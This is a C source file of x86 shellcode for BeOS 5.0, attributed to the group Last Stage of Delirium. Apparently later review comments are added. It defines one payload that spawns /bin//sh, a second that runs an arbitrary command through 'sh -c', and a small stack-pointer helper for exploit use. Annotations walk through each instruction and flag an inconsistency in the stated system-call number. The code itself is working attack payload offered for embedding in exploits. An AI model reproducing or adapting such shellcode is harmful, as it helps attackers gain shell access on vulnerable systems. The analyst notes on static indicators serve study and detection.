/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for beos 5.0 x86                                               #*/

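/*
Stack layout expected at the system-call trap, as built by the listings below.
The stack column lists 32-bit words starting at the top of the stack;
"->" means "pointer to", and "anum" is the number of entries in the
argument vector.

syscall     %eax stack
----------- ---- ---------------------------------------------------------------
execv       x03f ret,anum=1,->[->path="/bin//sh"],0
execv       x03f ret,anum=3,->[->path="/bin//sh",->a1="-c",->a2=cmd],0
*/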

#if defined(X86) && defined(BEOS)

/*
 * shellcode: x86 machine code (BeOS 5.0) that builds the string "/bin//sh"
 * on the stack and issues the execv-style trap with a one-entry argument
 * vector.
 *
 * Sequence, as encoded below:
 *   - %eax is zeroed and pushed, giving the string its terminating zero;
 *   - "//sh" then "/bin" are pushed, so "/bin//sh" sits at %esp;
 *   - %esp is pushed (pointer to the string) and %ebx is set to the address
 *     of that pointer, i.e. the one-element argument vector;
 *   - 0, %ebx, 1 and %eax (0) are pushed, which matches the first row of the
 *     stack table at the top of the file read from bottom to top;
 *   - %al is loaded with the call number and `int $0x25` traps.
 *
 * NOTE(review): the syscall table at the top of this file lists x03f in the
 * %eax column for execv, while this listing loads 0xa2 into %al. The two
 * disagree and nothing on the page says which one is authoritative.
 *
 * The comment gives 25 bytes for the code itself. As a C object the array is
 * one byte larger, because the string literal contributes a terminating NUL.
 *
 * For analysts: the ASCII immediates "/bin" and "//sh" and the trap bytes
 * cd 25 appear verbatim in the array, so they can serve as static indicators
 * when triaging a sample or a crash dump.
 */
char shellcode[]=          /* 25 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x54"                 /* pushl   %esp                   */ 
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x6a\x01"             /* pushb   $0x01                  */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\xa2"             /* movb    $0xa2,%al              */
    "\xcd\x25"             /* int     $0x25                  */ 
;

/*
 * cmdshellcode: x86 machine code (BeOS 5.0) that issues the execv-style trap
 * with the three-entry argument vector { "/bin//sh", "-c", cmd }.
 *
 * The command text is not part of this array. The code expects it to follow
 * the final call instruction directly in memory: the leading jmp goes to that
 * call (offset 39), the call returns control to offset 2 and leaves the
 * address of the byte after itself on the stack, and `popl %ecx` picks that
 * address up as the pointer to cmd.
 *
 * Sequence after the pop, as encoded below:
 *   - a zero word, "//sh" and "/bin" are pushed; %ebx points at "/bin//sh";
 *   - a zero word and the two bytes "-c" are pushed; %edi points at "-c";
 *   - %ecx (cmd), %edi ("-c") and %ebx (path) are pushed, and %ebx is set to
 *     the address of that three-pointer vector;
 *   - 0, %ebx, 3 and %eax (0) are pushed, which matches the second row of
 *     the stack table at the top of the file read from bottom to top;
 *   - %al is loaded with the call number and `int $0x25` traps.
 *
 * NOTE(review): as in shellcode[], the value loaded into %al (0xa2) differs
 * from the x03f given for execv in the table at the top of the file.
 *
 * The comment gives 44 bytes plus the command length. As declared here, the
 * C object is 45 bytes: the 44 code bytes followed by the string literal's
 * terminating NUL, which sits where the command would begin.
 */
char cmdshellcode[]=       /* 44+cmdlen bytes                */
    "\xeb\x25"             /* jmp     <cmdshellcode+39>      */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68""-c"         /* pushw   $0x632d                */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x51"                 /* pushl   %ecx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x6a\x03"             /* pushb   $0x03                  */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\xa2"             /* movb    $0xa2,%al              */
    "\xcd\x25"             /* int     $0x25                  */ 
    "\xe8\xd6\xff\xff\xff" /* call    <cmdshellcode+2>       */
    /* command */
;

/*
 * jump: three bytes of x86 code that copy the stack pointer into %eax and
 * return. How and where this routine is invoked is not shown in this file.
 * As a C object the array is four bytes, since the string literal adds a
 * terminating NUL after the ret.
 */
char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax            */
    "\xc3"                 /* ret                          */
;

#endif
